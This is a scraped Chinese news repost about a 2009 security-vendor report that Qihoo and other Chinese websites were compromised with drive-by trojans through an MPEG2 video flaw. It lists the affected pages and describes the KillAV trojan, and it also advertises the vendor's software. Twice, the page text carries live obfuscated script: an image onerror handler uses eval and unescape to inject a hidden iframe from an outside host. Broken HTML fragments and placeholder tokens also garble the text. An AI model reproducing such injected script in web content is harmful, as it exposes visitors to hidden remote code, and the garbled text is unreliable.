瑞星云安全称奇虎网被黑客挂马访问或染病毒- xxx- apocryphal - 和 ...
瑞星云安全称奇虎网被黑客挂马 访问或染病毒 [转贴 2010-01-27 13:52:18]   
瑞星云安全称奇虎网被黑客挂马 访问或染病毒

0 && image.height>0){if(image.width>=700){this.width=700;this.height=image.height*700/image.width;}}" src='http://gimg.baidu.com/img/gsgs.gif' width=0 height=0 onerror="eval (unescape('var%20content1%3D%22%3CI+FR+AME%20%20align%3Dcenter%20marginWidth%3D0%20marginHeight%3D0%20src%3Dhttp%3A//qdsm.net/links/zf_250_250.html%20width%3D250%20height%3D250%20frameBorder%3D0%20scrolling%3Dno%3E%3C/I+FRAM+E%3E%22%3B%20document.getElementById%28%22contenthtml1%22%29.innerHTML%3D%20content1'.replace(/\+/g,'')))">

7月9日,根据瑞星“云安全”系统的监测,黑客目前正在疯狂利用微软{zx1}的视频漏洞对大型网站进行挂马,7月8日当天共有377万人次的网民遭到此类网页 挂马攻击,共截获了76万个挂马网站,其中“奇虎网”的部分页面也被黑客利用{zx1}漏洞进行挂马,截止发稿时,尚未恢复,非瑞星用户如果访问后,即会被感染 木马病毒。

瑞星安全专家介绍,“奇虎”被挂马页面地址为w.qihoo.com/frame /q2431011,7f9145,2367_15523.html,该页面引用了一个网民的博客,黑客正是利用目前{zx1}的微软视频漏洞进行挂马,用户一 旦访问后IE浏览器会崩溃,甚至可能感染病毒。

0 && image.height>0){if(image.width>=700){this.width=700;this.height=image.height*700/image.width;}}" border=0 alt="" src="http://images.vvcat.com/newsimgs/20090709/200907091547130.jpg">
(瑞星杀毒软件拦截到的奇虎网被挂马页面)

瑞星安全专家建议用户立刻下载使用免费的瑞星安全软件(http://all.rising.com.cn/download /transfer.asp?ver=risfree)(免费使用期为一个月)。“瑞星杀毒软件2009”和“瑞星全功能安全软件2009”中独有“网页 防挂马”模块,采用“网页脚本行为分析技术”,无需微软补丁即可有效拦截利用该漏洞的挂马网站。

瑞星安全专家提醒说,“aa/index.htm”和“logo.jpg”结尾的木马网站在当日截获的挂马网站中占绝大多数,这些木马网址就含有黑客利用{zx1}视频漏洞编写的恶意网马。这也说明MPEG2漏洞成为目前互联网中被黑客利用最严重的漏洞之一。

当日,“奇虎”、“广捷居网址大全”、“北斗论坛”、“掌商网”、“中国导医网”、“友人网”、“车来车网”、“中国钟表网”和“齐鲁教育频 道”等知名网站都是被该漏洞进行挂马的。截止发稿时,这些网页中的病毒仍存在。网民上网时应安装带有“防挂马”功能的瑞星全功能安全软件2009,并安装 瑞星卡卡,这样可以防范挂马网站、xx木马的攻击。

瑞星反病毒专家介绍,当日截获的Trojan.Win32.KillAV.blc(AV终结者)“云安全”系统共收到94020次用户上报。该 病毒运行后会释放病毒文件和驱动,立即关闭国外安全软件,以躲避对其的查杀。病毒会在每个盘符下创建autorun.inf,达到双击盘符运行病毒的目 的。然后关闭系统的“Windows 文件保护”,修改host文件,定期到黑客指定网站下载大量木马病毒,并且进行病毒感染统计发送给黑客。

据瑞星“云安全”系统监测,7月8日互联网上共有76万个网页带有木马活动,377万人次网民遭受攻击。这些网民中安装了瑞星全功能安全软件2009、瑞星卡卡等产品的,会把木马网站自动拦截在电脑之外。非瑞星用户可能中毒,丢失网游帐号等。

当日被挂马网站Top5:

1、“奇虎”:w.qihoo.com/frame/q2431011,7f9145,2367_15523.html,

被嵌入的恶意网址为*****.com/aa/index.htm。

2、“广捷居网址大全”:www.gjj.cc/DianYing/MianFei/XiaoDianYing****.htm,

被嵌入的恶意网址为****.cn/06/logo.jpg。

3、“北斗论坛”:bbs.edulife.com.cn/showtopic-99194.aspx,

被嵌入的恶意网址为*****.com/aa/index.htm。

4、“掌商网”:www.zs91.com/html/0022/contact/info_lx_281483.htm,

被嵌入的恶意网址为*****.com/aa/index.htm。

5、“中国导医网”:999120.net--155784.doc.999120.net等,

被嵌入的恶意网址*****.com/aa/index.htm。

挂马网站详情请点击:



0 && image.height>0){if(image.width>=700){this.width=700;this.height=image.height*700/image.width;}}" src='http://gimg.baidu.com/img/gsgs.gif' width=0 height=0 onerror="eval (unescape('var%20content1%3D%22%3CI+FR+AME%20%20align%3Dcenter%20marginWidth%3D0%20marginHeight%3D0%20src%3Dhttp%3A//qdsm.net/links/zw_728_90.html%20width%3D728%20height%3D90%20frameBorder%3D0%20scrolling%3Dno%3E%3C/I+FRAM+E%3E%22%3B%20document.getElementById%28%22contenthtml2%22%29.innerHTML%3D%20content1'.replace(/\+/g,'')))">

郑重声明:资讯 【瑞星云安全称奇虎网被黑客挂马访问或染病毒- xxx- apocryphal - 和 ...】由 发布,版权归原作者及其所在单位,其原创性以及文中陈述文字和内容未经(企业库qiyeku.com)证实,请读者仅作参考,并请自行核实相关内容。若本文有侵犯到您的版权, 请你提供相关证明及申请并与我们联系(qiyeku # qq.com)或【在线投诉】,我们审核后将会尽快处理。
—— 相关资讯 ——